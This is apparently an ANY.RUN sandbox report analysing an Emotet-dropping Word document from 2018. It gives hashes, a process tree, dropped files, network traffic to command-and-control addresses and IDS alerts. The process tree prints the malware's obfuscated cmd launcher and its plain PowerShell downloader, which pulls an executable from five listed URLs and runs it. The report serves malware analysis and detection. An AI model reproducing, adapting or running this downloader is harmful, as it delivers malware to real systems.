File name: | 121920187A9V23160.doc |
Full analysis: | https://app.any.run/tasks/802efc5a-5d4b-4bd0-a695-889f0fc18d25 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded into a very destructive piece of malware. It targets mostly corporate victims, but private users also get infected through mass spam email campaigns. |
Analysis date: | December 18, 2018, 21:31:51 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Dec 18 20:15:00 2018, Last Saved Time/Date: Tue Dec 18 20:15:00 2018, Number of Pages: 1, Number of Words: 4, Number of Characters: 26, Security: 0 |
MD5: | 6024ADFE9C7E91E6BB9367AA61CC6476 |
SHA1: | 0E216E4D64722E3D50E4E43AB50735A814009FFB |
SHA256: | F043CB2F6FEC7AAC1014308A4EFF9B1F5BBFA5187D0AA6B5123079616C6951E7 |
SSDEEP: | 1536:bd81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadugQ8UUaovoU+a9:bd8GhDS0o9zTGOZD6EbzCdugQ8/o |
.doc | | | Microsoft Word document (54.2) |
---|---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:12:18 20:15:00 |
ModifyDate: | 2018:12:18 20:15:00 |
Pages: | 1 |
Words: | 4 |
Characters: | 26 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 29 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: | |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2832 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\121920187A9V23160.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
4084 | c:\i0651860547267\h3249438289644\Q4051730915624\..\..\..\windows\system32\cmd.exe /c %pRogRaMdATa:~0,1%%prOGraMdATA:~9,2% /V:On /C " sET AP=;'378s'=811a$}}{hctac}};kaerb;'416I'=713D$;650T$ metI-ekovnI{ )00008 eg- htgnel.)650T$ metI-teG(( fI;'499O'=403E$;)650T$ ,554A$(eliFdaolnwoD.714o${yrt{)105C$ ni 554A$(hcaerof;'exe.'+846j$+'\'+pmet:vne$=650T$;'610Q'=557f$;'876' = 846j$;'316G'=988C$;)'@'(tilpS.'HISlYGVwv/slianbmuhTpw/segami/lortnocemoh/moc.gnisiurctsuj//:ptth@44lqDch2/ten.ngisedycal//:ptth@ttcvje2by5/moc.ennaojybedam//:ptth@xxaiBq8Ga/moc.zepolohcnap//:ptth@qFAy6Zuy/moc.syskilk//:ptth'=105C$;tneilCbeW.teN tcejbo-wen=714o$;'234w'=126j$ ll%1,3-~:PMET%h%1,4-~:EMANNOISSES%r%1,5~:CILBUP%wop& FOr /l %3 iN ( 554 -1 0)do SET 7ne=!7ne!!AP:~ %3, 1!&IF %3 == 0 ecHO !7ne:~5! | C%appdAtA:~-4,1%%sYSTeMrooT:~-4,-3% " | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2600 | CmD /V:On /C " sET AP=;'378s'=811a$}}{hctac}};kaerb;'416I'=713D$;650T$ metI-ekovnI{ )00008 eg- htgnel.)650T$ metI-teG(( fI;'499O'=403E$;)650T$ ,554A$(eliFdaolnwoD.714o${yrt{)105C$ ni 554A$(hcaerof;'exe.'+846j$+'\'+pmet:vne$=650T$;'610Q'=557f$;'876' = 846j$;'316G'=988C$;)'@'(tilpS.'HISlYGVwv/slianbmuhTpw/segami/lortnocemoh/moc.gnisiurctsuj//:ptth@44lqDch2/ten.ngisedycal//:ptth@ttcvje2by5/moc.ennaojybedam//:ptth@xxaiBq8Ga/moc.zepolohcnap//:ptth@qFAy6Zuy/moc.syskilk//:ptth'=105C$;tneilCbeW.teN tcejbo-wen=714o$;'234w'=126j$ ll%1,3-~:PMET%h%1,4-~:EMANNOISSES%r%1,5~:CILBUP%wop& FOr /l %3 iN ( 554 -1 0)do SET 7ne=!7ne!!AP:~ %3, 1!&IF %3 == 0 ecHO !7ne:~5! | Cmd " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2608 | C:\Windows\system32\cmd.exe /S /D /c" ecHO pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $j621='w432';$o417=new-object Net.WebClient;$C501='http://kliksys.com/yuZ6yAFq@http://pancholopez.com/aG8qBiaxx@http://madebyjoanne.com/5yb2ejvctt@http://lacydesign.net/2hcDql44@http://justcruising.com/homecontrol/images/wpThumbnails/vwVGYlSIH'.Split('@');$C889='G613';$j648 = '678';$f755='Q016';$T056=$env:temp+'\'+$j648+'.exe';foreach($A455 in $C501){try{$o417.DownloadFile($A455, $T056);$E304='O994';If ((Get-Item $T056).length -ge 80000) {Invoke-Item $T056;$D317='I614';break;}}catch{}}$a118='s873'; " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2696 | Cmd | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3160 | powershell $j621='w432';$o417=new-object Net.WebClient;$C501='http://kliksys.com/yuZ6yAFq@http://pancholopez.com/aG8qBiaxx@http://madebyjoanne.com/5yb2ejvctt@http://lacydesign.net/2hcDql44@http://justcruising.com/homecontrol/images/wpThumbnails/vwVGYlSIH'.Split('@');$C889='G613';$j648 = '678';$f755='Q016';$T056=$env:temp+'\'+$j648+'.exe';foreach($A455 in $C501){try{$o417.DownloadFile($A455, $T056);$E304='O994';If ((Get-Item $T056).length -ge 80000) {Invoke-Item $T056;$D317='I614';break;}}catch{}}$a118='s873'; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2476 | "C:\Users\admin\AppData\Local\Temp\678.exe" | C:\Users\admin\AppData\Local\Temp\678.exe | — | powershell.exe |
User: admin Company: Microsoft Corporat Integrity Level: MEDIUM Description: Stoh Levadihote (non-ShiftLock) Keyboa Exit code: 0 | ||||
3236 | "C:\Users\admin\AppData\Local\Temp\678.exe" | C:\Users\admin\AppData\Local\Temp\678.exe | | 678.exe |
User: admin Company: Microsoft Corporat Integrity Level: MEDIUM Description: Stoh Levadihote (non-ShiftLock) Keyboa Exit code: 0 | ||||
2916 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | — | 678.exe |
User: admin Company: Microsoft Corporat Integrity Level: MEDIUM Description: Stoh Levadihote (non-ShiftLock) Keyboa Exit code: 0 | ||||
3404 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | | archivesymbol.exe |
User: admin Company: Microsoft Corporat Integrity Level: MEDIUM Description: Stoh Levadihote (non-ShiftLock) Keyboa |
PID | Process | Filename | Type | |
---|---|---|---|---|
2832 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8D13.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2832 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C67505AD.wmf | — | |
MD5:— | SHA256:— | |||
2832 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DA3C5143.wmf | — | |
MD5:— | SHA256:— | |||
3160 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\64MUMPUUN9KQFFSDR6H5.temp | — | |
MD5:— | SHA256:— | |||
2832 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:F7123D8F84C82D70BE3A2FDB3AE61BC0 | SHA256:8B13C9874C6DD9798D38D931EA3870E0036D0211CF875329D2BFFB832C91FDEE | |||
3160 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2832 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\421937CA.wmf | wmf | |
MD5:979A2B65F157282E9DD4CA39ABC95A78 | SHA256:652DB83709BE73BA9A92723B73CCEFCC1AE9B859F870E26B6EBC10248DB063DC | |||
3236 | 678.exe | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | executable | |
MD5:CC4E8AB88AFA5B810A3FDAC5D11DCD5F | SHA256:48EAE9CD765777DE531E06DA251E5B02118871E6E3986EEF580443808B3F8432 | |||
2832 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:3E4CFF688FD3055569BCE3CEBEBB0BAB | SHA256:3CC8A8056BE01C55F9374664389D18C26592B1D993C38137FDE23D8977A1AD04 | |||
2832 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\90807D5C.wmf | wmf | |
MD5:EDB2F62BADC35E507F10B2FAEECC571F | SHA256:57A15807E410C55271B1738DE2312D61174E4126E049051484FB241B430DF3DD |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3404 | archivesymbol.exe | GET | — | 187.140.90.91:8080 | http://187.140.90.91:8080/ | MX | — | — | malicious |
3404 | archivesymbol.exe | GET | — | 201.190.150.60:443 | http://201.190.150.60:443/ | AR | — | — | malicious |
3404 | archivesymbol.exe | GET | — | 78.189.21.131:80 | http://78.189.21.131/ | TR | — | — | malicious |
3160 | powershell.exe | GET | 200 | 158.69.193.16:80 | http://kliksys.com/yuZ6yAFq/ | CA | executable | 124 Kb | malicious |
3160 | powershell.exe | GET | 301 | 158.69.193.16:80 | http://kliksys.com/yuZ6yAFq | CA | html | 236 b | malicious |
3404 | archivesymbol.exe | GET | — | 181.197.253.133:8080 | http://181.197.253.133:8080/ | AR | — | — | suspicious |
3404 | archivesymbol.exe | GET | 200 | 70.55.69.202:7080 | http://70.55.69.202:7080/ | CA | binary | 132 b | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3160 | powershell.exe | 158.69.193.16:80 | kliksys.com | OVH SAS | CA | suspicious |
3404 | archivesymbol.exe | 81.150.17.158:50000 | — | British Telecommunications PLC | GB | malicious |
3404 | archivesymbol.exe | 78.189.21.131:80 | — | Turk Telekom | TR | malicious |
3404 | archivesymbol.exe | 213.120.119.231:8443 | — | British Telecommunications PLC | GB | malicious |
3404 | archivesymbol.exe | 81.150.17.158:8443 | — | British Telecommunications PLC | GB | malicious |
3404 | archivesymbol.exe | 187.140.90.91:8080 | — | Uninet S.A. de C.V. | MX | malicious |
3404 | archivesymbol.exe | 201.190.150.60:443 | — | ARLINK S.A. | AR | malicious |
3404 | archivesymbol.exe | 70.55.69.202:7080 | — | Bell Canada | CA | suspicious |
3404 | archivesymbol.exe | 181.197.253.133:8080 | — | BVNET S.A. | AR | suspicious |
Domain | IP | Reputation |
---|---|---|
kliksys.com | | malicious |
dns.msftncsi.com | | shared |
PID | Process | Class | Message |
---|---|---|---|
3160 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3160 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3160 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3160 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3160 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3404 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
3404 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
3404 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
3404 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
3404 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |